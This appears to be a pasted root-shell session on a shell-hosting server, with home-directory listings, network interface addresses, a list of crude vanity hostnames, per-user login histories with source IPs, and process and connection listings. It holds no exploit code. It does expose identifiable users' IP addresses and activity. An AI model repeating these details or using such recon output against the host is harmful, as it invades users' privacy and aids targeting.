drwxr-xr-x 2 jerryste jerryste 512 Dec 28 14:19 jerryste/
|
||
-rw-r--r-- 1 root wheel 0 Oct 5 2007 jj.log
|
||
drwxr-xr-x 2 jschultk jschultk 512 May 31 2007 jschultk/
|
||
drwxr-xr-x 2 jtracy jtracy 512 Dec 3 2008 jtracy/
|
||
drwxr-xr-x 2 katsst katsst 512 Apr 12 2007 katsst/
|
||
drwxr-xr-x 15 khicks khicks 1024 Jan 2 2008 khicks/
|
||
drwxr-xr-x 2 kingzy kingzy 512 Feb 22 16:50 kingzy/
|
||
drwxr-xr-x 4 kokoryu kokoryu 512 Feb 1 16:54 kokoryu/
|
||
drwxr-xr-x 2 kooner kooner 512 Mar 24 17:34 kooner/
|
||
drwxr-xr-x 2 kruapra kruapra 512 Jan 1 2008 kruapra/
|
||
drwxr-xr-x 2 ksafusi ksafusi 512 Jan 29 2008 ksafusi/
|
||
drwxr-xr-x 2 l33t l33t 512 Apr 12 2007 l33t/
|
||
drwxr-xr-x 2 lailoke lailoke 512 Mar 11 22:12 lailoke/
|
||
drwxr-xr-x 9 lordy lordy 512 May 17 04:05 lordy/
|
||
drwxr-xr-x 8 ltootle ltootle 512 Jun 10 2008 ltootle/
|
||
drwxr-xr-x 15 lyhne1 lyhne1 1024 May 25 23:00 lyhne1/
|
||
drwxr-xr-x 6 lymelyte lymelyte 512 Mar 29 14:18 lymelyte/
|
||
drwxr-xr-x 3 lynx lynx 512 May 28 2008 lynx/
|
||
drwxr-xr-x 2 mae21 mae21 512 Mar 8 21:02 mae21/
|
||
drwxr-xr-x 5 manboo manboo 512 Jul 7 2008 manboo/
|
||
drwxr-xr-x 3 matt matt 512 Jun 20 19:25 matt/
|
||
drwxr-xr-x 2 methanl methanl 512 Feb 5 2008 methanl/
|
||
drwxr-xr-x 6 mimik0r mimik0r 512 May 20 2008 mimik0r/
|
||
drwxr-xr-x 2 mindben mindben 512 Nov 24 2008 mindben/
|
||
drwxr-xr-x 7 mlh mlh 512 Apr 8 01:12 mlh/
|
||
drwxr-xr-x 3 mogle3 mogle3 512 Apr 8 12:06 mogle3/
|
||
drwxr-xr-x 3 mooo mooo 512 May 21 20:50 mooo/
|
||
drwxr-xr-x 5 mrts mrts 512 Mar 18 01:51 mrts/
|
||
drwxr-xr-x 9 narcissu narcissu 512 Feb 2 2008 narcissu/
|
||
drwxr-xr-x 7 nardi nardi 512 Mar 24 10:55 nardi/
|
||
drwxr-xr-x 3 nek0o nek0o 512 Jul 21 2008 nek0o/
|
||
drwxr-xr-x 3 neohax neohax 512 Jun 13 2007 neohax/
|
||
drwxr-xr-x 3 nexxtea nexxtea 512 Apr 19 2007 nexxtea/
|
||
drwxr-xr-x 9 nodex nodex 512 Sep 5 2007 nodex/
|
||
drwxr-xr-x 2 nsc wheel 512 Apr 12 2007 nsc/
|
||
drwxr-xr-x 3 nyakz nyakz 512 Mar 13 20:13 nyakz/
|
||
drwxr-xr-x 9 oby1 oby1 512 Feb 13 2008 oby1/
|
||
drwxr-xr-x 21 omelette omelette 1024 Jun 1 2008 omelette/
|
||
drwxr-xr-x 2 omen omen 512 Nov 24 2008 omen/
|
||
drwxr-xr-x 5 omgwtf omgwtf 512 Apr 27 03:17 omgwtf/
|
||
drwxr-xr-x 5 owine owine 512 Apr 21 2008 owine/
|
||
drwxr-xr-x 6 own3d own3d 512 Oct 15 2008 own3d/
|
||
drwxr-xr-x 5 paleride paleride 512 Jan 27 17:55 paleride/
|
||
drwxr-xr-x 2 pbx pbx 512 Dec 28 14:22 pbx/
|
||
drwxr-xr-x 2 percott1 percott1 512 Jun 24 2008 percott1/
|
||
drwxr-xr-x 8 pimpinjg pimpinjg 512 Jun 23 07:20 pimpinjg/
|
||
drwxr-xr-x 4 poolboy poolboy 512 Aug 29 2007 poolboy/
|
||
drwxr-xr-x 3 prodigy prodigy 512 May 30 2008 prodigy/
|
||
drwxr-xr-x 3 psycoz psycoz 512 Jun 7 17:01 psycoz/
|
||
drwxr-xr-x 2 qberto qberto 512 Mar 17 12:09 qberto/
|
||
drwxr-xr-x 7 qfx qfx 512 Feb 17 04:54 qfx/
|
||
drwxr-xr-x 4 quinn quinn 512 Aug 10 2007 quinn/
|
||
drwxr-xr-x 5 reaper90 reaper90 512 Dec 2 2007 reaper90/
|
||
drwxr-xr-x 22 redrum redrum 1024 Jun 9 12:49 redrum/
|
||
drwxr-xr-x 5 reznik reznik 512 Apr 11 2008 reznik/
|
||
drwxr-xr-x 4 rice21 rice21 512 Dec 17 2008 rice21/
|
||
drwxr-xr-x 4 rikt rikt 512 Feb 17 06:27 rikt/
|
||
drwxr-xr-x 5 romeo romeo 512 Jun 20 02:58 romeo/
|
||
drwxr-xr-x 7 roodyk roodyk 512 Apr 26 14:04 roodyk/
|
||
drwxr-xr-x 3 sacred sacred 512 Jun 1 2007 sacred/
|
||
drwxr-xr-x 3 safety safety 512 Feb 15 2008 safety/
|
||
drwxr-xr-x 2 sakik1 sakik1 512 Dec 3 2008 sakik1/
|
||
drwxr-xr-x 2 sal sal 512 Feb 16 17:17 sal/
|
||
drwxr-xr-x 5 schlomer schlomer 512 Aug 24 2007 schlomer/
|
||
drwxr-xr-x 7 scouse scouse 1536 Nov 5 2008 scouse/
|
||
drwxr-xr-x 5 sharpie sharpie 512 Apr 13 2007 sharpie/
|
||
drwxr-xr-x 5 shoes shoes 512 Mar 7 22:32 shoes/
|
||
drwxr-xr-x 2 silver15 silver15 512 Mar 25 2008 silver15/
|
||
drwxr-xr-x 3 simonbh simonbh 512 Aug 9 2007 simonbh/
|
||
drwxr-xr-x 9 sinistro sinistro 512 Oct 5 2007 sinistro/
|
||
drwxr-xr-x 2 skit skit 512 Apr 12 2007 skit/
|
||
drwxr-xr-x 6 skypilot skypilot 512 Nov 7 2008 skypilot/
|
||
drwxr-xr-x 5 smash smash 512 Jun 22 01:29 smash/
|
||
drwxr-xr-x 6 sqd sqd 512 May 7 20:56 sqd/
|
||
drwxr-xr-x 3 ssaws ssaws 512 Feb 3 23:20 ssaws/
|
||
drwxr-xr-x 4 ste ste 512 Jun 15 12:29 ste/
|
||
drwxr-xr-x 5 subkult subkult 512 Feb 3 11:59 subkult/
|
||
drwxr-xr-x 7 sysc sysc 512 Jun 11 10:27 sysc/
|
||
drwxr-xr-x 9 tarawa tarawa 512 May 26 10:51 tarawa/
|
||
drwxr-xr-x 3 tea tea 512 Mar 16 2008 tea/
|
||
drwxr-xr-x 5 techi3 techi3 512 Aug 29 2007 techi3/
|
||
drwxr-xr-x 5 timgor timgor 1024 Sep 3 2007 timgor/
|
||
drwxr-xr-x 3 tlm tlm 512 May 1 2007 tlm/
|
||
drwxr-xr-x 7 vamp vamp 1024 Nov 20 2007 vamp/
|
||
drwxr-xr-x 2 vietnigh vietnigh 512 Mar 8 15:31 vietnigh/
|
||
drwxr-xr-x 3 visage visage 512 Mar 13 15:59 visage/
|
||
drwxr-xr-x 4 vitalrbj vitalrbj 512 May 15 2007 vitalrbj/
|
||
drwxr-xr-x 3 vividbreeze vividbreeze 512 May 15 2005 vividbreeze/
|
||
drwxr-xr-x 2 voxitize voxitize 512 Aug 18 2008 voxitize/
|
||
drwxr-xr-x 5 warlordz warlordz 512 Aug 20 2007 warlordz/
|
||
drwxr-xr-x 3 wchan21 wchan21 512 Dec 15 2008 wchan21/
|
||
drwxr-xr-x 4 wolf wolf 512 Aug 28 2008 wolf/
|
||
drwxr-xr-x 2 xavi xavi 512 Feb 1 16:56 xavi/
|
||
drwxr-xr-x 3 xckx xckx 512 Oct 4 2007 xckx/
|
||
drwxr-xr-x 4 xkelsx xkelsx 512 Dec 16 2008 xkelsx/
|
||
drwxr-xr-x 5 y2j y2j 512 May 15 08:42 y2j/
|
||
drwxr-xr-x 13 yaquis yaquis 1024 Jun 11 14:32 yaquis/
|
||
drwxr-xr-x 8 zeepysea zeepysea 512 Oct 21 2008 zeepysea/
|
||
drwxr-xr-x 6 zenchi zenchi 512 Nov 29 2007 zenchi/
|
||
drwxr-xr-x 4 zime zime 512 Feb 15 2008 zime/
|
||
drwxr-xr-x 3 zoo zoo 512 Apr 14 2007 zoo/
|
||
[root@velocity:/home]#
|
||
|
||
|
||
[root@velocity:/home]# ifconfig
|
||
bge0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
|
||
options=1b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING>
|
||
inet 72.20.3.98 netmask 0xfffffffc broadcast 72.20.3.99
|
||
inet 72.20.28.193 netmask 0xffffffff broadcast 72.20.28.193
|
||
inet 72.20.28.194 netmask 0xffffffff broadcast 72.20.28.194
|
||
inet 72.20.28.195 netmask 0xffffffff broadcast 72.20.28.195
|
||
inet 72.20.28.196 netmask 0xffffffff broadcast 72.20.28.196
|
||
inet 72.20.28.197 netmask 0xffffffff broadcast 72.20.28.197
|
||
inet 72.20.28.198 netmask 0xffffffff broadcast 72.20.28.198
|
||
inet 72.20.28.199 netmask 0xffffffff broadcast 72.20.28.199
|
||
inet 72.20.28.200 netmask 0xffffffff broadcast 72.20.28.200
|
||
inet 72.20.28.201 netmask 0xffffffff broadcast 72.20.28.201
|
||
inet 72.20.28.202 netmask 0xffffffff broadcast 72.20.28.202
|
||
inet 72.20.28.203 netmask 0xffffffff broadcast 72.20.28.203
|
||
inet 72.20.28.204 netmask 0xffffffff broadcast 72.20.28.204
|
||
inet 72.20.28.205 netmask 0xffffffff broadcast 72.20.28.205
|
||
inet 72.20.28.206 netmask 0xffffffff broadcast 72.20.28.206
|
||
inet 72.20.28.207 netmask 0xffffffff broadcast 72.20.28.207
|
||
inet 72.20.28.208 netmask 0xffffffff broadcast 72.20.28.208
|
||
inet 72.20.28.209 netmask 0xffffffff broadcast 72.20.28.209
|
||
inet 72.20.28.210 netmask 0xffffffff broadcast 72.20.28.210
|
||
inet 72.20.28.211 netmask 0xffffffff broadcast 72.20.28.211
|
||
inet 72.20.28.212 netmask 0xffffffff broadcast 72.20.28.212
|
||
inet 72.20.28.213 netmask 0xffffffff broadcast 72.20.28.213
|
||
inet 72.20.28.214 netmask 0xffffffff broadcast 72.20.28.214
|
||
inet 72.20.28.215 netmask 0xffffffff broadcast 72.20.28.215
|
||
inet 72.20.28.216 netmask 0xffffffff broadcast 72.20.28.216
|
||
inet 72.20.28.217 netmask 0xffffffff broadcast 72.20.28.217
|
||
inet 72.20.28.218 netmask 0xffffffff broadcast 72.20.28.218
|
||
inet 72.20.28.219 netmask 0xffffffff broadcast 72.20.28.219
|
||
inet 72.20.28.220 netmask 0xffffffff broadcast 72.20.28.220
|
||
inet 72.20.28.221 netmask 0xffffffff broadcast 72.20.28.221
|
||
inet 72.20.28.222 netmask 0xffffffff broadcast 72.20.28.222
|
||
inet 72.20.28.223 netmask 0xffffffff broadcast 72.20.28.223
|
||
inet 72.20.28.224 netmask 0xffffffff broadcast 72.20.28.224
|
||
inet 72.20.28.225 netmask 0xffffffff broadcast 72.20.28.225
|
||
inet 72.20.28.226 netmask 0xffffffff broadcast 72.20.28.226
|
||
inet 72.20.28.227 netmask 0xffffffff broadcast 72.20.28.227
|
||
inet 72.20.28.228 netmask 0xffffffff broadcast 72.20.28.228
|
||
inet 72.20.28.229 netmask 0xffffffff broadcast 72.20.28.229
|
||
inet 72.20.28.230 netmask 0xffffffff broadcast 72.20.28.230
|
||
inet 72.20.28.231 netmask 0xffffffff broadcast 72.20.28.231
|
||
inet 72.20.28.232 netmask 0xffffffff broadcast 72.20.28.232
|
||
inet 72.20.28.233 netmask 0xffffffff broadcast 72.20.28.233
|
||
inet 72.20.28.234 netmask 0xffffffff broadcast 72.20.28.234
|
||
inet 72.20.28.235 netmask 0xffffffff broadcast 72.20.28.235
|
||
inet 72.20.28.236 netmask 0xffffffff broadcast 72.20.28.236
|
||
inet 72.20.28.237 netmask 0xffffffff broadcast 72.20.28.237
|
||
inet 72.20.28.238 netmask 0xffffffff broadcast 72.20.28.238
|
||
inet 72.20.28.239 netmask 0xffffffff broadcast 72.20.28.239
|
||
inet 72.20.28.240 netmask 0xffffffff broadcast 72.20.28.240
|
||
inet 72.20.28.241 netmask 0xffffffff broadcast 72.20.28.241
|
||
inet 72.20.28.242 netmask 0xffffffff broadcast 72.20.28.242
|
||
inet 72.20.28.243 netmask 0xffffffff broadcast 72.20.28.243
|
||
inet 72.20.28.244 netmask 0xffffffff broadcast 72.20.28.244
|
||
inet 72.20.28.245 netmask 0xffffffff broadcast 72.20.28.245
|
||
inet 72.20.28.246 netmask 0xffffffff broadcast 72.20.28.246
|
||
inet 72.20.28.247 netmask 0xffffffff broadcast 72.20.28.247
|
||
inet 72.20.28.248 netmask 0xffffffff broadcast 72.20.28.248
|
||
inet 72.20.28.249 netmask 0xffffffff broadcast 72.20.28.249
|
||
inet 72.20.28.250 netmask 0xffffffff broadcast 72.20.28.250
|
||
inet 72.20.28.251 netmask 0xffffffff broadcast 72.20.28.251
|
||
inet 72.20.28.252 netmask 0xffffffff broadcast 72.20.28.252
|
||
inet 72.20.28.253 netmask 0xffffffff broadcast 72.20.28.253
|
||
inet 72.20.28.254 netmask 0xffffffff broadcast 72.20.28.254
|
||
ether 00:11:11:cc:09:63
|
||
media: Ethernet 10baseT/UTP <full-duplex>
|
||
status: active
|
||
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
|
||
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
|
||
inet6 ::1 prefixlen 128
|
||
inet 127.0.0.1 netmask 0xff000000
|
||
[root@velocity:/home]#
|
||
|
||
|
||
[root@velocity:/usr/home]# cat /bin/vhosts
|
||
#!/usr/local/bin/bash
|
||
echo "
|
||
|
||
_ __/ /_ ____ _____/ /______
|
||
| | / / __ \/ __ \/ ___/ __/ ___/
|
||
| |/ / / / / /_/ (__ ) /_(__ )
|
||
|___/_/ /_/\____/____/\__/____/
|
||
www.vitalspeeds.com/vhosts
|
||
|
||
72.20.3.98 -\> .
|
||
72.20.28.193 -\> scaring.us.
|
||
72.20.28.194 -\> .
|
||
72.20.28.195 -\> George.W.Bush.is.scaring.us.
|
||
72.20.28.196 -\> l33t.hax0rs.are.scaring.us.
|
||
72.20.28.197 -\> your.mom.is.scaring.us.
|
||
72.20.28.198 -\> irc.isidling.net.
|
||
72.20.28.199 -\> everyone.isalways.idling.net.
|
||
72.20.28.200 -\> just.idling.net.
|
||
72.20.28.201 -\> the.mpaa.keeps.scaring.us.
|
||
72.20.28.202 -\> the.riaa.keeps.scaring.us.
|
||
72.20.28.203 -\> defaultxbe.com.
|
||
72.20.28.204 -\> ownage.net.
|
||
72.20.28.205 -\> absolute.ownage.net.
|
||
72.20.28.206 -\> complete.ownage.net.
|
||
72.20.28.207 -\> is.the.godofgods.net.
|
||
72.20.28.208 -\> fatblunts.com.
|
||
72.20.28.209 -\> will.work.for.fatblunts.com.
|
||
72.20.28.210 -\> smokes.fatblunts.com.
|
||
72.20.28.211 -\> rolls.fatblunts.com.
|
||
72.20.28.212 -\> fuckdapolice.com.
|
||
72.20.28.213 -\> killed.my.wife.and.said.fuckdapolice.com.
|
||
72.20.28.214 -\> owned.nasa.and.said.fuckdapolice.com.
|
||
72.20.28.215 -\> playah.org.
|
||
72.20.28.216 -\> big.time.playah.org.
|
||
72.20.28.217 -\> still.a.playah.org.
|
||
72.20.28.218 -\> the.original.playah.org.
|
||
72.20.28.219 -\> shitsngiggles.net.
|
||
72.20.28.220 -\> packeted.gov.for.shitsngiggles.net.
|
||
72.20.28.221 -\> us-govt.info.
|
||
72.20.28.222 -\> has.topsecret.us-govt.info.
|
||
72.20.28.223 -\> steals.us-govt.info.
|
||
72.20.28.224 -\> packets.the.us-govt.info.
|
||
72.20.28.225 -\> oblivion.globalwar.net.
|
||
72.20.28.226 -\> started.a.globalwar.net.
|
||
72.20.28.227 -\> irc.sith-net.com.
|
||
72.20.28.228 -\> i.am.away.idling.net.
|
||
72.20.28.229 -\> you.got.schooled.org.
|
||
72.20.28.230 -\> wonders.why.arabs.like.to.fuck.withthe.us.
|
||
72.20.28.231 -\> dont.fuck.withthe.us.
|
||
72.20.28.232 -\> stole.your-ip.info.
|
||
72.20.28.233 -\> has.your-ip.info.
|
||
72.20.28.234 -\> overflo.ws.
|
||
72.20.28.235 -\> your.mom.needs.a.tampon.before.she.overflo.ws.
|
||
72.20.28.236 -\> buffer.overflo.ws.
|
||
72.20.28.237 -\> got.hacked.by.buffer.overflo.ws.
|
||
72.20.28.238 -\> the.toilet.overflo.ws.
|
||
72.20.28.239 -\> i.made.the.hoover.dam.overflo.ws.
|
||
72.20.28.240 -\> i.am.teh.antidr.ug.
|
||
72.20.28.241 -\> irc.cheazey.net.
|
||
72.20.28.242 -\> staff.vitalspeeds.com.
|
||
72.20.28.243 -\> oper.idlenetworks.net.
|
||
72.20.28.244 -\> .
|
||
72.20.28.245 -\> .
|
||
72.20.28.246 -\> .
|
||
72.20.28.247 -\> .
|
||
72.20.28.248 -\> .
|
||
72.20.28.249 -\> .
|
||
72.20.28.250 -\> .
|
||
72.20.28.251 -\> .
|
||
72.20.28.252 -\> .
|
||
72.20.28.253 -\> cyberia.is.scaring.us.
|
||
72.20.28.254 -\> anarchy.fuckdapolice.com.
|
||
"
|
||
|
||
|
||
[root@velocity:~]# last root
|
||
|
||
wtmp begins Mon Jun 1 06:20:11 CDT 2009
|
||
[root@velocity:~]# last romeo
|
||
romeo ttypg 188.49.118.210 Wed Jun 17 18:35 - 18:35 (00:00)
|
||
|
||
wtmp begins Mon Jun 1 06:20:11 CDT 2009
|
||
[root@velocity:~]# last pimpinjg
|
||
pimpinjg ttyp2 cpe-76-175-20-18 Wed Jun 24 07:29 - 07:51 (00:22)
|
||
pimpinjg ttyp2 cpe-76-175-20-18 Wed Jun 24 05:47 - 06:44 (00:56)
|
||
pimpinjg ttyp3 cpe-76-175-20-18 Wed Jun 24 05:41 - 05:46 (00:05)
|
||
pimpinjg ttyp3 cpe-76-175-20-18 Wed Jun 24 05:40 - 05:41 (00:00)
|
||
pimpinjg ttyp1 cpe-76-175-20-18 Wed Jun 24 05:30 - 05:41 (00:10)
|
||
pimpinjg ttyp1 cpe-76-175-20-18 Wed Jun 24 04:32 - 04:35 (00:02)
|
||
pimpinjg ttyp3 cpe-76-175-20-18 Tue Jun 23 20:54 - 20:54 (00:00)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:47 - 20:53 (12:06)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42 (00:05)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43 (00:06)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36 (00:00)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32 (01:12)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36 (01:20)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13 (00:01)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12 (00:00)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10 (02:10)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25 (00:42)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59 (00:07)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38 (00:01)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28 (00:01)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17 (00:01)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43 (00:28)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14 (00:02)
|
||
pimpinjg ttypf cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07 (00:04)
|
||
pimpinjg ttypd cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14 (00:28)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05 (00:50)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14 (00:07)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54 (00:31)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24 (00:43)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37 (00:24)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21 (00:01)
|
||
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19 (00:33)
|
||
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40 (00:02)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49 (00:19)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26 (00:05)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18 (00:01)
|
||
pimpinjg ttype cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12 (00:08)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03 (00:02)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00 (00:04)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55 (00:11)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12 (00:03)
|
||
pimpinjg ttypf cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33 (00:01)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48 (00:50)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51 (00:16)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23 (00:16)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53 (00:01)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25 (00:03)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08 (00:06)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29 (00:10)
|
||
pimpinjg ttypd cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14 (00:00)
|
||
pimpinjg ttypd 76.175.20.182 Fri Jun 19 20:41 - 20:43 (00:01)
|
||
pimpinjg ttypf cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57 (00:04)
|
||
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12 (00:01)
|
||
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07 (00:14)
|
||
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41 (00:12)
|
||
pimpinjg ttypd cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44 (00:41)
|
||
pimpinjg ttypd cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52 (00:42)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37 (00:00)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37 (00:06)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30 (00:00)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29 (00:01)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27 (00:00)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26 (00:00)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25 (00:01)
|
||
|
||
wtmp begins Mon Jun 1 06:20:11 CDT 2009
|
||
[root@velocity:~]#
|
||
|
||
[root@velocity:~]# ps -aux | grep romeo
|
||
root 60582 0.0 0.2 5400 2036 ?? Is 3:32AM 0:00.16 sshd: romeo [priv] (sshd)
|
||
romeo 60584 0.0 0.2 5384 2088 ?? S 3:32AM 0:01.47 sshd: (sshd)
|
||
romeo 51236 0.0 0.2 3268 1836 p0 Is 11:50PM 0:00.03 /usr/local/bin/bash
|
||
romeo 51241 0.0 0.6 9296 6136 p0 S+ 11:50PM 0:10.95 irssi -h absolute.ownage.net
|
||
romeo 60586 0.0 0.2 3244 1900 p2 Is 3:32AM 0:00.04 -bash (bash)
|
||
romeo 62761 0.0 0.1 2040 1448 p2 S+ 4:25AM 0:00.04 screen -r
|
||
|
||
[root@velocity:~]# lsof -i -n | grep romeo
|
||
irssi 51241 romeo 3u IPv4 0xca130740 0t0 TCP 72.20.28.205:61626->71.6.199.68:ircd (ESTABLISHED)
|
||
irssi 51241 romeo 4u IPv4 0xc58c4740 0t0 TCP 72.20.28.205:53292->66.225.223.70:ircd (ESTABLISHED)
|
||
irssi 51241 romeo 7u IPv4 0xca04a1d0 0t0 TCP 72.20.28.205:62094->94.102.58.212:ircd (ESTABLISHED)
|
||
sshd 60584 romeo 3u IPv4 0xc9e971d0 0t0 TCP 72.20.28.248:ssh->188.49.23.137:28098 (ESTABLISHED)
|
||
[root@velocity:~]#
|
||
|
||
root@velocity:/var/run]# ps -auxwww
|
||
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
|
||
root 10 83.0 0.0 0 8 ?? RL 27Jan08 534762:26.98 [idle]
|
||
lyhne1 85085 11.3 0.3 10700 3096 ?? S 11May09 1274:26.14 /home/lyhne1/services/services
|
||
root 0 0.0 0.0 0 0 ?? WLs 27Jan08 0:00.08 [swapper]
|
||
root 1 0.0 0.0 772 80 ?? ILs 27Jan08 21:20.52 /sbin/init --
|
||
root 2 0.0 0.0 0 8 ?? DL 27Jan08 38:47.98 [g_event]
|
||
root 3 0.0 0.0 0 8 ?? DL 27Jan08 187:53.55 [g_up]
|
||
root 4 0.0 0.0 0 8 ?? DL 27Jan08 141:20.71 [g_down]
|
||
root 5 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [kqueue taskq]
|
||
root 6 0.0 0.0 0 8 ?? DL 27Jan08 0:00.01 [thread taskq]
|
||
root 7 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [acpi_task_0]
|
||
root 8 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [acpi_task_1]
|
||
root 9 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [acpi_task_2]
|
||
root 11 0.0 0.0 0 8 ?? WL 27Jan08 3371:26.93 [swi4: clock sio]
|
||
root 12 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi3: vm]
|
||
root 13 0.0 0.0 0 8 ?? WL 27Jan08 6365:16.77 [swi1: net]
|
||
root 14 0.0 0.0 0 8 ?? DL 27Jan08 557:44.26 [yarrow]
|
||
root 15 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi6: task queue]
|
||
root 16 0.0 0.0 0 8 ?? WL 27Jan08 0:00.01 [swi6: Giant taskq]
|
||
root 17 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi5: +]
|
||
root 18 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi2: cambio]
|
||
root 19 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq9: acpi0]
|
||
root 20 0.0 0.0 0 8 ?? WL 27Jan08 5058:47.37 [irq16: bge0]
|
||
root 21 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq21: uhci0 ehci0]
|
||
root 22 0.0 0.0 0 8 ?? DL 27Jan08 0:02.22 [usb0]
|
||
root 23 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [usbtask]
|
||
root 24 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq22: uhci1]
|
||
root 25 0.0 0.0 0 8 ?? DL 27Jan08 0:02.68 [usb1]
|
||
root 26 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq18: uhci2]
|
||
root 27 0.0 0.0 0 8 ?? DL 27Jan08 0:01.99 [usb2]
|
||
root 28 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq23: uhci3]
|
||
root 29 0.0 0.0 0 8 ?? DL 27Jan08 0:02.09 [usb3]
|
||
root 30 0.0 0.0 0 8 ?? DL 27Jan08 0:02.34 [usb4]
|
||
root 31 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq14: ata0]
|
||
root 32 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq15: ata1]
|
||
root 33 0.0 0.0 0 8 ?? WL 27Jan08 149:12.28 [irq20: atapci1]
|
||
